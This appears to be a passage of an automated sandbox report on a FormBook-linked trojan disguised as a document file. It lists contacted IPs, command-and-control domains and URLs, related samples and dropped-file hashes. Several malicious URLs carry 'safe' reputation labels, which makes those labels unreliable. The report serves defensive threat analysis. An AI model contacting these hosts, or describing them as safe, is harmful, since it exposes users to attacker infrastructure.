                                                              http://files.cloud.naver.com/Status/GenerateKey.ndrivePASU5160894680 DOCS.scr.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designersPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.goodfont.co.krPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://cloud.naver.com/PASU5160894680 DOCS.scr.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.sajatypeworks.comPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.typography.netDPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cn/cThePASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcontrol.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/DPleasePASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fonts.comPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.sandoll.co.krPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csscontrol.exe, 00000006.00000002.4134255300.0000000005E4C000.00000004.10000000.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4133356305.0000000003E7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.urwpp.deDPleasePASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.zhongyicts.com.cnPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.globyglen.infouFLByAWAOFbhtV.exe, 0000000A.00000002.4134964235.0000000005910000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePASU5160894680 DOCS.scr.exe, 00000000.00000002.1717296789.0000000003420000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.sakkal.comPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722359296.0000000005E10000.00000004.00000020.00020000.00000000.sdmp, PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.healtheduction.site/2frz/?3tV=l87n7Q89KFkj22mcQvGyKsY8DOdSYtwW2ZIksm0w5n2yQMdP8QPDEmc5KUcontrol.exe, 00000006.00000002.4134255300.0000000006C6E000.00000004.10000000.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4133356305.0000000004C9E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.apache.org/licenses/LICENSE-2.0PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fontbureau.comPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://files.cloud.naver.com/DoDelete.ndrivePASU5160894680 DOCS.scr.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.ecosia.org/newtab/control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.carterandcone.comlPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://ac.ecosia.org/autocomplete?q=control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/cabarga.htmlNPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cnPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-user.htmlPASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.thinkphp.cncontrol.exe, 00000006.00000002.4134255300.0000000006626000.00000004.10000000.00040000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4133356305.0000000004656000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://files.cloud.naver.com/CheckUpload.ndrivePASU5160894680 DOCS.scr.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.jiyu-kobo.co.jp/PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://files.cloud.naver.comPASU5160894680 DOCS.scr.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers8PASU5160894680 DOCS.scr.exe, 00000000.00000002.1722501158.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://files.cloud.naver.com/Status/Get.ndrivePASU5160894680 DOCS.scr.exefalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=control.exe, 00000006.00000002.4136032077.0000000008118000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              43.135.99.21
                                                              		laohuang.zhongshengxinyun.comJapan4249LILLY-ASUStrue
                                                              203.161.43.228
                                                              		www.lyxor.topMalaysia
                                                              		45899VNPT-AS-VNVNPTCorpVNtrue
                                                              160.251.148.115
                                                              		www.fslab.techJapan7506INTERQGMOInternetIncJPtrue
                                                              91.184.0.200
                                                              		jobworklanka.onlineNetherlands
                                                              		197902HOSTNETNLtrue
                                                              76.223.113.161
                                                              		justlivn.netUnited States
                                                              		16509AMAZON-02UStrue
                                                              84.32.84.37
                                                              		www.healtheduction.site.cdn.hstgr.netLithuania
                                                              		33922NTT-LT-ASLTtrue
                                                              79.125.89.83
                                                              		www.academy-training.xyzIreland
                                                              		16509AMAZON-02UStrue
                                                              185.199.108.153
                                                              		ncumibrs.github.ioNetherlands
                                                              		54113FASTLYUStrue
                                                              3.33.130.190
                                                              		unveiled.digitalUnited States
                                                              		8987AMAZONEXPANSIONGBtrue
                                                              154.23.176.197
                                                              		www.shipincheshi.skinUnited States
                                                              		174COGENT-174UStrue
                                                              45.113.201.77
                                                              		www.sssqqq07-22.funChina
                                                              		137697CHINATELECOM-JIANGSU-YANGZHOU-IDCCHINATELECOMJiangSuYangZtrue

                                                              General Information

                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                              Analysis ID:1510085
                                                              Start date and time:2024-09-12 15:04:07 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 11m 9s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:12
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:2
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:PASU5160894680 DOCS.scr.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@10/7@19/11
                                                              EGA Information:
                                                              • Successful, ratio: 75%
                                                              HCA Information:
                                                              • Successful, ratio: 95%
                                                              • Number of executed functions: 97
                                                              • Number of non-executed functions: 280
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target uFLByAWAOFbhtV.exe, PID 2496 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: PASU5160894680 DOCS.scr.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              09:04:59API Interceptor1x Sleep call for process: PASU5160894680 DOCS.scr.exe modified
                                                              09:05:01API Interceptor12x Sleep call for process: powershell.exe modified
                                                              09:05:52API Interceptor11544586x Sleep call for process: control.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              43.135.99.21LKkVS1VFJD.exeGet hashmaliciousFormBookBrowse
                                                              • www.jz07259dkijw.cloud/74k4/
                                                              DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                              • www.jz07259dkijw.cloud/3fy6/
                                                              203.161.43.228Purchase Order TE- 00011-7777.exeGet hashmaliciousFormBookBrowse
                                                              • www.quilo.life/ftr3/
                                                              Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                                                              • www.quilo.life/ftr3/
                                                              PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                                                              • www.quilo.life/ftr3/
                                                              Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                                                              • www.virox.top/basq/
                                                              Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                                                              • www.quilo.life/ftr3/
                                                              PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                                                              • www.quilo.life/ftr3/
                                                              6i4QCFbsNi.exeGet hashmaliciousFormBookBrowse
                                                              • www.virox.top/basq/
                                                              DEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                                              • www.lyxor.top/top4/
                                                              PO 18-3081.exeGet hashmaliciousFormBookBrowse
                                                              • www.velix.buzz/0qme/
                                                              GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                                                              • www.fynra.xyz/i65r/
                                                              160.251.148.115DEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                                              • www.fslab.tech/5jwl/
                                                              REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
                                                              • www.fslab.tech/bvwy/
                                                              REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                                                              • www.fslab.tech/bvwy/
                                                              GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                                                              • www.fslab.tech/k44t/
                                                              INVG0088 LHV3495264 BL327291535V.exeGet hashmaliciousFormBookBrowse
                                                              • www.fslab.tech/bvwy/
                                                              PURCHASE ORDER_330011 SEPTEMBER 2024.exeGet hashmaliciousFormBookBrowse
                                                              • www.fslab.tech/bvwy/

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              laohuang.zhongshengxinyun.comDEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                                              • 43.135.99.21
                                                              LKkVS1VFJD.exeGet hashmaliciousFormBookBrowse
                                                              • 43.135.99.21
                                                              DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                              • 43.135.99.21
                                                              www.lyxor.topDEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                                              • 203.161.43.228
                                                              ncumibrs.github.ioDEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                                              • 185.199.108.153
                                                              GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                                                              • 185.199.109.153
                                                              www.academy-training.xyzDEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                                              • 52.212.173.134
                                                              www.shipincheshi.skinJsn496Em5T.exeGet hashmaliciousFormBookBrowse
                                                              • 154.23.176.197
                                                              play.exeGet hashmaliciousFormBookBrowse
                                                              • 154.23.176.197
                                                              www.healtheduction.site.cdn.hstgr.netOrder#Qxz091124.exeGet hashmaliciousFormBookBrowse
                                                              • 84.32.84.59
                                                              PO00211240906.exeGet hashmaliciousFormBookBrowse
                                                              • 154.41.250.28

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              VNPT-AS-VNVNPTCorpVNPurchase Order TE- 00011-7777.exeGet hashmaliciousFormBookBrowse
                                                              • 203.161.43.228
                                                              Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                                                              • 203.161.43.228
                                                              PDF PURCHASE INQUIRY PDF.exeGet hashmaliciousFormBookBrowse
                                                              • 203.161.42.73
                                                              PO 09110124 EXPRESS SYSTEM-SESB24066.exeGet hashmaliciousFormBookBrowse
                                                              • 203.161.43.228
                                                              Jsn496Em5T.exeGet hashmaliciousFormBookBrowse
                                                              • 203.161.43.228
                                                              MV ALIADO-S-REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                              • 203.161.42.73
                                                              Doc_PO6900000827.exeGet hashmaliciousFormBookBrowse
                                                              • 203.161.43.228
                                                              PO_20240906011824.exeGet hashmaliciousFormBookBrowse
                                                              • 203.161.43.228
                                                              doc330391202408011.exeGet hashmaliciousFormBookBrowse
                                                              • 203.161.42.73
                                                              yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                                                              • 203.161.42.73
                                                              INTERQGMOInternetIncJPhttps://smex-ctp.trendmicro.com/wis/clicktime/v1/query?url=http%3a%2f%2f3d1.gmobb.jp%2fdcm299ccyag4e%2fgov&umid=c9da0305-3df1-4ca9-b55d-4eb1dc21d559&auth=e8718e3df01d3f6f6a26ecc437e1fe16569b02b3-ce2cb0a9999be4b21ec568df281766cb7c88743eGet hashmaliciousPhisherBrowse
                                                              • 133.130.64.224
                                                              firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                              • 150.95.255.38
                                                              arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                              • 157.7.79.184
                                                              i686.elfGet hashmaliciousUnknownBrowse
                                                              • 210.157.62.155
                                                              69.165.74.77-mips-2024-09-05T03_23_55.elfGet hashmaliciousMirai, MoobotBrowse
                                                              • 157.7.100.16
                                                              bot_library.exeGet hashmaliciousUnknownBrowse
                                                              • 160.251.46.239
                                                              DEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                                              • 160.251.148.115
                                                              ojtBIU0jhM.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                              • 160.251.151.144
                                                              REQST_PRC 410240665_2024.exeGet hashmaliciousFormBookBrowse
                                                              • 160.251.148.115
                                                              REQST_PRC 410240.exeGet hashmaliciousFormBookBrowse
                                                              • 160.251.148.115
                                                              LILLY-ASUSmlnZfOifRX.elfGet hashmaliciousOkiruBrowse
                                                              • 43.74.44.172
                                                              SecuriteInfo.com.Linux.Siggen.9999.15962.9862.elfGet hashmaliciousMiraiBrowse
                                                              • 40.171.48.24
                                                              SecuriteInfo.com.Linux.Siggen.9999.11579.20419.elfGet hashmaliciousMiraiBrowse
                                                              • 43.146.154.29
                                                              BxSi44GgR7.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                                                              • 43.137.69.76
                                                              kkGs66WA6x.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                                                              • 43.137.69.76
                                                              tDnjjDsM8d.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                                                              • 43.137.69.76
                                                              JSrybHIGxt.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                                                              • 43.137.69.76
                                                              ClbZrjB4z0.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                                                              • 43.137.69.76
                                                              BUjJGpv9Rv.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                                                              • 43.137.69.76
                                                              qID9dPG3MI.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                                                              • 43.137.69.76
                                                              HOSTNETNLz27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeGet hashmaliciousFormBookBrowse
                                                              • 91.184.0.111
                                                              firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                              • 91.184.0.99
                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                              • 91.184.0.200
                                                              DEBIT NOTE July 2024 PART 2.exeGet hashmaliciousFormBookBrowse
                                                              • 91.184.0.200
                                                              COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                              • 91.184.0.200
                                                              ORDER_pdf.exeGet hashmaliciousFormBookBrowse
                                                              • 91.184.0.200
                                                              GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exeGet hashmaliciousFormBookBrowse
                                                              • 91.184.0.200
                                                              bintoday1.exeGet hashmaliciousFormBookBrowse
                                                              • 91.184.0.200
                                                              ORDER_38746_pdf.exeGet hashmaliciousFormBookBrowse
                                                              • 91.184.0.200
                                                              z1PEDIDODECOMPRAURGENTE.exeGet hashmaliciousFormBookBrowse
                                                              • 91.184.0.111

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PASU5160894680 DOCS.scr.exe.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.34331486778365
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1172
                                                              Entropy (8bit):5.354777075714867
                                                              Encrypted:false
                                                              SSDEEP:24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                              MD5:92C17FC0DE8449D1E50ED56DBEBAA35D
                                                              SHA1:A617D392757DC7B1BEF28448B72CBD131CF4D0FB
                                                              SHA-256:DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
                                                              SHA-512:603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                              C:\Users\user\AppData\Local\Temp\-zud0E

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\control.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                              Category:dropped
                                                              Size (bytes):114688
                                                              Entropy (8bit):0.9746603542602881
                                                              Encrypted:false
                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1u5akofx.tei.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvp5sbje.jun.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tt2yim2u.d2l.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzypnh4h.jk3.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
